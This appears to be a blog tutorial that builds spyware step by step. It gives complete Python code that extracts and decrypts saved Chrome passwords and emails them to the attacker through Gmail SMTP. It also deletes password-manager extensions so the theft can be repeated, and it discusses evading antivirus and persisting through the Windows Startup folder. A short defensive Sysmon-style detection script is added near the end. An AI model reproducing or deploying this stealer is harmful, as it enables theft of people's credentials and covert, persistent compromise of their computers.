Making Simple Spyware to steal Chrome passwords
chromePasswordThieve is an easy-to-develop program that is so elementary that it evades antivirus.
We start by creating a file called chromePasswordThieve.py with the following imports and constants:
import os
import os.path as op
import shutil
import smtplib
import win32crypt
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formatdate
from shutil import copyfile
from sqlite3 import connect

FROM = "from@gmail.com"  # source email
PASSWORD = "password"  # source email password
TO = "to@gmail.com"  # destination email
SUBJECT = "data for chromePasswordThieve.py"
MESSAGE = """\
here is output.txt :)
"""
env = os.getenv("LOCALAPPDATA")  # Chrome's profile folder lives under %LOCALAPPDATA%; used by getPass() below
Be sure to change FROM, PASSWORD and TO to your desired values.
Now that we have our basic setup out of the way, we can get started. We begin by creating two functions, getPass() and sendEmail():
def getPass():
    pass


def sendEmail():
    pass
We will base our getPass() function on the work of @darkarp, using sqlite3 and win32crypt.CryptUnprotectData to select the saved credentials from Chrome's Login Data database. If you are wondering why this is so easy, you can read this; the inner workings of this function can be read here.
We modify lines 145-196 of that script to create the body of our getPass():
def getPass():
    # https://github.com/darkarp/chrome-password-hacking/blob/master/create_server.py
    destination = "output.txt"
    path = env + "\\Google\\Chrome\\User Data\\Default\\Login Data"
    path2 = env + "\\Google\\Chrome\\User Data\\Default\\Login2"
    path = path.strip()
    path2 = path2.strip()
    try:
        # work on a copy of the database rather than the live file
        copyfile(path, path2)
    except Exception:
        pass
    conn = connect(path2)
    cursor = conn.cursor()
    cursor.execute(
        'SELECT action_url, username_value, password_value FROM logins')
    if os.path.exists(destination):
        os.remove(destination)
    sites = []
    for raw in cursor.fetchall():
        # raw[0] = url, raw[1] = login, raw[2] = DPAPI-encrypted password blob
        try:
            if raw[0] not in sites:
                # CryptUnprotectData returns (description, data); [1] is the decrypted bytes
                with open(destination, "a") as password:
                    password.write('\n' + "Website: " + raw[0] + '\n' + "User/email: " + raw[1] +
                                   '\n' + "Password: " + format(win32crypt.CryptUnprotectData(raw[2])[1]) + '\n')
                sites.append(raw[0])
        except Exception:
            continue
    conn.close()
    return 0
Next, from stackoverflow.com, we figure out how to send an email with attachments.
The code I ended up with is:
def sendEmail():
    # https://stackoverflow.com/questions/3362600/how-to-send-email-attachments
    msg = MIMEMultipart()
    msg['From'] = FROM
    msg['To'] = TO
    msg['Date'] = formatdate(localtime=True)
    msg['Subject'] = SUBJECT
    msg.attach(MIMEText(MESSAGE))
    part = MIMEBase('application', "octet-stream")
    with open('output.txt', 'rb') as file:
        part.set_payload(file.read())
    encoders.encode_base64(part)
    part.add_header('Content-Disposition',
                    'attachment; filename="{}"'.format(op.basename('output.txt')))  # name(s) of attachment(s)
    msg.attach(part)
    smtp = smtplib.SMTP('smtp.gmail.com', 587)
    smtp.starttls()
    smtp.login(FROM, PASSWORD)
    smtp.sendmail(FROM, TO, msg.as_string())
    smtp.quit()
    print('successfully sent the mail')
Finally, we call our two functions:
getPass()
sendEmail()
The code works as expected:
Website: https://www.facebook.com/login/device-based/regular/login/
User/email: email@live.ca
Password: b'password'

Website: https://www.investopedia.com/accounts/login.aspx
User/email: email@gmail.com
Password: b'password'

Website: https://portal.aws.amazon.com/billing/signup
User/email: alik604
Password: b'password'
Now let's attempt to go above and beyond.
Not all people will click 'save password' in Chrome; perhaps they have a password manager instead. Let's deal with that.
For this to be of benefit, our code will need to run a second time in the future. Including this code is of marginal cost to us, so we might as well:
env = os.getenv("LOCALAPPDATA")
path_lastpass = env + "\\Google\\Chrome\\User Data\\Default\\Extensions\\hdokiejnpimakedhajhdlcegeplioahd"
path_keeper = env + "\\Google\\Chrome\\User Data\\Default\\Extensions\\bfogiafebfohielmmehodmfbbebbbpei"
path_dasklane = env + "\\Google\\Chrome\\User Data\\Default\\Extensions\\fdjamakpfbbddfjaooikfcpapjohcfmg"
path_roboform = env + "\\Google\\Chrome\\User Data\\Default\\Extensions\\pnlccmojcmeohlpggmfnbbiapkmbliob"
try:
    shutil.rmtree(path_lastpass)
    shutil.rmtree(path_keeper)
    shutil.rmtree(path_dasklane)
    shutil.rmtree(path_roboform)
except Exception:
    pass
We set our path variables to the corresponding Chrome extension folders. We get each extension id with the following:
To run this script we would either need to have Python installed on the target computer, or convert it to an executable.
@lpoblet has a detailed tutorial on creating an executable, while a more concise tutorial can be found on Stack Overflow.
Checking if chromePasswordThieve.py evades antivirus
"VirusTotal aggregates many antivirus products and online scan engines to check for viruses that the user's own antivirus may have missed, or to verify against any false positives." - Wikipedia
The following is an example of how more openly malicious programs evade antivirus:
On a final note, let's discuss persistence mechanisms.
attack.mitre.org has a proper list of persistence techniques. Many are advanced and difficult to do, due to both a lack of educational resources and their complexity. Examples of professional/government-grade persistence would be hooking and process injection; more details on the latter may be found here.
To make chromePasswordThieve.py persistent we can use techniques such as Shortcut Modification, or placing a compatible program in the startup folder.
To find the Windows startup folder we refer to the following:
We can easily pair the above with shutil.copyfile to copy our file into the startup folder. It is advisable to delete the original instance.
More information on persistence mechanisms can be found here.
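For the defender's view of the steps above, here is an added example that is not part of the original post or its code: a small Python detector run over constructed Sysmon-style events that flags the four behaviours this post relies on, namely a non-Chrome process writing a Login database copy into a Chrome profile, deletion of files under the Extensions folder, an SMTP connection from something other than a mail client, and a file dropped into the Startup folder. The event field names (Image, TargetFilename, DestinationPort, DestinationHostname) follow Sysmon, but the records, process paths and thresholds are assumptions made up for the example.

```python
import re

# Constructed Sysmon-style events: field names follow Sysmon (Image, TargetFilename,
# DestinationPort, DestinationHostname); the records themselves are made up for this example.
PROFILE = r"\\Google\\Chrome\\User Data\\[^\\]+\\"      # any Chrome profile directory
LOGIN_DB = re.compile(PROFILE + r"Login[^\\]*$", re.I)  # 'Login Data', 'Login2', ...
EXTENSION = re.compile(PROFILE + r"Extensions\\", re.I)
STARTUP = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
SMTP_PORTS = {25, 465, 587}
BROWSER = {"chrome.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}       # processes expected to talk SMTP
INSTALLERS = {"explorer.exe", "msiexec.exe"}            # processes expected to write Startup

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the findings for one event; an empty list means nothing matched."""
    img, kind, target = basename(ev.get("Image", "")), ev["EventType"], ev.get("TargetFilename", "")
    findings = []
    if kind == "FileCreate" and LOGIN_DB.search(target) and img not in BROWSER:
        findings.append(f"{img} wrote a login database copy inside a Chrome profile")
    if kind == "FileDelete" and EXTENSION.search(target) and img not in BROWSER:
        findings.append(f"{img} deleted Chrome extension file {basename(target)}")
    if kind == "NetworkConnect" and ev.get("DestinationPort") in SMTP_PORTS and img not in MAIL_CLIENTS:
        findings.append(f"{img} opened SMTP to {ev['DestinationHostname']}:{ev['DestinationPort']}")
    if kind == "FileCreate" and STARTUP.search(target) and img not in INSTALLERS:
        findings.append(f"{img} dropped {basename(target)} into the Startup folder")
    return findings

def scan(events):
    return [f for ev in events for f in check_event(ev)]

PROFILE_DIR = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default"  # constructed
PY = r"C:\Python37\python.exe"                                                    # constructed
SAMPLE_EVENTS = [
    {"EventType": "FileCreate", "Image": PY, "TargetFilename": PROFILE_DIR + r"\Login2"},
    {"EventType": "FileDelete", "Image": PY,
     "TargetFilename": PROFILE_DIR + r"\Extensions\hdokiejnpimakedhajhdlcegeplioahd\manifest.json"},
    {"EventType": "NetworkConnect", "Image": PY, "DestinationHostname": "smtp.gmail.com", "DestinationPort": 587},
    {"EventType": "FileCreate", "Image": PY,
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\thieve.exe"},
    # benign: Chrome maintaining its own database, Outlook sending mail
    {"EventType": "FileCreate", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": PROFILE_DIR + r"\Login Data-journal"},
    {"EventType": "NetworkConnect", "Image": r"C:\Program Files\Microsoft Office\OUTLOOK.EXE",
     "DestinationHostname": "smtp.office365.com", "DestinationPort": 587},
]
if __name__ == "__main__":
    print("\n".join("ALERT: " + f for f in scan(SAMPLE_EVENTS)))
```

The two benign records produce no alert, so the rules key on which process performs the action rather than on the Chrome paths alone.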
I am releasing the core code on my GitHub.
You can read the core of my other projects at github.com/alik604/ReadMe; a few of my interesting Python or security projects are myPyBackDoor and data science.
About me:
3rd-year Cognitive Science major, VP of the Cognitive Science Student Society. Interested in machine learning, computational data science, and finance. Research interests are applications of quantitative analytics in finance and human behavior.